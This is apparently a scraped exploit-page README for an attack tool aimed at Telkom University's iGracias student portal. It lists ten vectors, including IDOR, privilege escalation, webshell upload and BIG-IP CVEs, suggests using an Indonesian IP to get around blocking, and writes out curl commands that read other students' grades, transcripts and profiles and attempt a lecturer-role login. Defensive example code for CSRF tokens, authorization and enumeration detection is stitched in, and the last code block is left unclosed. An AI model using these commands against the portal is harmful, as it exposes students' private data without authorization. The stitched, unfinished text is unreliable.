## https://sploitus.com/exploit?id=649313DD-31AD-562A-AF7A-09744ED8C4C5
# 🎯 iGracias Security Audit — Telkom University

Comprehensive security testing suite for `igracias.telkomuniversity.ac.id`.

**Stack detected:** nginx + PHP + MySQL + F5 BIG-IP  
**IP blocking:** the server blocks foreign IPs; run from an Indonesian IP for best results.

## 🔬 Attack Vectors

| # | Vector | Description | Risk |
|---|--------|-------------|------|
| 1 | **CSRF** | Login form has NO token — weaponize | 🔴 |
| 2 | **IDOR (Nilai/IPK)** | Read other students' grades (nilai) & GPA (IPK) via their NIM | 🔴 |
| 3 | **IDOR (Profile)** | Access other students' personal data | 🔴 |
| 4 | **Privilege Escalation** | Log in as the lecturer (dosen)/admin role | 🔴 |
| 5 | **NIM Brute-Force** | Scan a range of NIMs for exposed data | 🔴 |
| 6 | **SQL Injection** | Time-based / error-based (WAF dependent) | 🟡 |
| 7 | **LFI/RFI** | File inclusion via the `page`/`file` parameter | 🟡 |
| 8 | **Stored XSS** | Inject script via profile fields | 🟡 |
| 9 | **File Upload** | Upload webshell | 🟡 |
| 10 | **F5 BIG-IP CVE** | CVE-2020-5902 / CVE-2022-1388 | 🟡 |
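Vector 1 exists because the login form can be submitted without any value an attacker's page could not supply. The fix on the server side is a synchronizer token bound to the (pre-authentication) session cookie and checked before the credentials are looked at. The block below is an added example, not code from igracias-audit or from the iGracias portal; the in-memory `session` dict, the `csrf_token` field name and the two handler functions are assumptions chosen to show the unprotected handler next to the hardened one.

```python
"""Login-form CSRF protection with a per-session synchronizer token.

Added example; not part of igracias-audit or of the iGracias portal.
The session dict, the 'csrf_token' form field and both handlers are assumptions.
"""
import hmac
import secrets
from typing import Optional


def issue_csrf_token(session: dict) -> str:
    """Create (or reuse) a random token bound to this session.

    For a login form the session is the anonymous pre-authentication
    session cookie; the token is rendered into the form as a hidden field.
    """
    if "csrf_token" not in session:
        session["csrf_token"] = secrets.token_urlsafe(32)
    return session["csrf_token"]


def validate_csrf(session: dict, submitted: Optional[str]) -> bool:
    """Constant-time comparison of the submitted field with the session token."""
    expected = session.get("csrf_token")
    if expected is None or submitted is None:
        return False
    return hmac.compare_digest(expected, submitted)


def handle_login_vulnerable(session: dict, form: dict) -> str:
    """The pattern the table describes: any POST carrying the two credential
    fields is processed, so a form hosted elsewhere can submit it through the
    victim's browser and log the victim into an account it did not choose."""
    if form.get("textUsername") and form.get("textPassword"):
        return "processed"
    return "rejected"


def handle_login_hardened(session: dict, form: dict) -> str:
    """Token is verified before the credentials are even examined."""
    if not validate_csrf(session, form.get("csrf_token")):
        return "rejected: csrf token missing or invalid"
    if form.get("textUsername") and form.get("textPassword"):
        # Rotate the token after a successful login so the pre-auth token
        # cannot be replayed into the authenticated session.
        session.pop("csrf_token", None)
        issue_csrf_token(session)
        return "processed"
    return "rejected"


if __name__ == "__main__":
    s = {}
    token = issue_csrf_token(s)
    creds = {"textUsername": "USER", "textPassword": "PASS"}
    print(handle_login_vulnerable(s, creds))                          # processed
    print(handle_login_hardened(s, creds))                            # rejected: ...
    print(handle_login_hardened(s, {**creds, "csrf_token": token}))   # processed
```

The token has to be per session and compared in constant time; a site-wide constant or a token readable from a cross-origin page gives no protection. In a real PHP deployment the same logic sits in the login controller, with the token kept in `$_SESSION`.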

## 🚀 Quick Start

```bash
git clone https://github.com/fahriamura/igracias-audit.git
cd igracias-audit
pip install requests
python3 igracias.py
```

### Menu

```
1) RECON       — Headers, tech stack, CSRF detection
2) AUTH        — Login, SQLi test, CSRF exploit generation
3) POST-AUTH   — IDOR (Nilai/IPK/profile), NIM brute-force, Priv Esc
4) INFRA       — F5 CVEs, directory listing, backup files
5) RUN ALL     — Full automated scan
6) REPORT      — Generate comprehensive report
0) EXIT
```

## ๐Ÿ“ Output

- `results/audit_report.txt` — Full security report
- `results/audit_results.json` — Machine-readable results
- `results/csrf_exploit.html` — CSRF PoC (open in a browser)

## 🎯 IDOR Manual Testing (from a laptop in Indonesia)

```bash
# Get a session first (log in via the browser)
# Then, with a valid session cookie:

# Read another student's GRADES (nilai)
curl -b 'PHPSESSID=xxxx' 'https://igracias.telkomuniversity.ac.id/index.php?page=nilai&nim=13011XXXX'
curl -b 'PHPSESSID=xxxx' 'https://igracias.telkomuniversity.ac.id/index.php?page=transkrip&nim=13011XXXX'
curl -b 'PHPSESSID=xxxx' 'https://igracias.telkomuniversity.ac.id/index.php?page=ipk&nim=13011XXXX'

# Read another student's PROFILE
curl -b 'PHPSESSID=xxxx' 'https://igracias.telkomuniversity.ac.id/index.php?page=profile&nim=13011XXXX'

# Try to access the LECTURER (dosen) panel
curl -b 'PHPSESSID=xxxx' 'https://igracias.telkomuniversity.ac.id/index.php?page=dosen&id=1'
```

## 🔴 Privilege Escalation (Lecturer Login)

```bash
# Try with an extra role parameter
curl -X POST 'https://igracias.telkomuniversity.ac.id/' \
  -d 'textUsername=USER&textPassword=PASS&role=dosen&submit=Login'

# If a lecturer session has leaked, use its cookie directly
curl -b 'PHPSESSID=xxxx_dosen' 'https://igracias.telkomuniversity.ac.id/index.php?page=dashboard'
```
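Vectors 2 to 5 and the role-parameter test above all reduce to one server-side question: does the identity bound to the session cookie authorize the record named in the URL, with the role taken from the user store rather than from the request? The block below is an added example, not code from igracias-audit or from the iGracias portal. The user store, the page names, the `advisees` relation and the access-log line format are constructed; `login` accepts a `form_role` argument only to show that it has no effect, and `flag_nim_enumeration` shows the detection side of vector 5 over constructed log lines.

```python
"""Server-side authorization for student-record pages plus NIM-enumeration detection.

Added example; not part of igracias-audit or of the iGracias portal.
USERS, STUDENT_PAGES, the advisee relation and the log format are constructed.
"""
import hmac
from collections import defaultdict
from typing import Dict, List, Optional

# Constructed user store. The role lives here, never in the request body.
USERS: Dict[str, dict] = {
    "s001": {"password": "pw-s001", "role": "student", "nim": "1301100001"},
    "s002": {"password": "pw-s002", "role": "student", "nim": "1301100002"},
    "d001": {"password": "pw-d001", "role": "dosen", "advisees": {"1301100001"}},
}
STUDENT_PAGES = {"nilai", "transkrip", "ipk", "profile"}


def login(username: str, password: str, form_role: Optional[str] = None) -> Optional[dict]:
    """Return a session dict, or None on bad credentials.

    form_role mirrors the 'role=dosen' POST field from the README; it is
    deliberately unused, so the session role is whatever the user store says.
    """
    user = USERS.get(username)
    if user is None or not hmac.compare_digest(user["password"], password):
        return None
    session = {"user": username, "role": user["role"]}
    if user["role"] == "student":
        session["nim"] = user["nim"]  # identity bound to the cookie, not the URL
    return session


def authorize(session: Optional[dict], page: str, requested_nim: Optional[str]) -> bool:
    """Decide whether this session may view `page` for `requested_nim`."""
    if session is None:
        return False
    role = session["role"]
    if page == "dosen":
        return role == "dosen"
    if page in STUDENT_PAGES:
        if role == "student":
            # A student sees only the record bound to the session; a nim in the
            # query string that differs from it is refused (the IDOR case).
            return requested_nim is None or requested_nim == session["nim"]
        if role == "dosen":
            # Lecturers are limited to students they actually advise.
            return requested_nim in USERS[session["user"]]["advisees"]
    return False


def flag_nim_enumeration(log_lines: List[str], threshold: int = 20) -> Dict[str, int]:
    """Count distinct nim= values per session id in key=value access-log lines.

    A session touching more distinct NIMs than `threshold` matches the
    brute-force pattern of vector 5, whether or not the IDOR itself is fixed.
    """
    seen = defaultdict(set)
    for line in log_lines:
        fields = dict(kv.split("=", 1) for kv in line.split() if "=" in kv)
        sid, nim = fields.get("sid"), fields.get("nim")
        if sid and nim:
            seen[sid].add(nim)
    return {sid: len(nims) for sid, nims in seen.items() if len(nims) > threshold}


# Constructed log sample: one normal session, one sweeping 30 consecutive NIMs.
SAMPLE_LOG = ["sid=aaa page=nilai nim=1301100001"] * 3 + [
    f"sid=bbb page=nilai nim=13011{i:05d}" for i in range(30)
]


if __name__ == "__main__":
    student = login("s001", "pw-s001", form_role="dosen")
    print(student["role"])                                  # student
    print(authorize(student, "nilai", "1301100002"))         # False
    print(authorize(student, "nilai", "1301100001"))         # True
    print(flag_nim_enumeration(SAMPLE_LOG))                  # {'bbb': 30}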

## โš ๏ธ Disclaimer

For authorized security testing only. Ensure you have permission.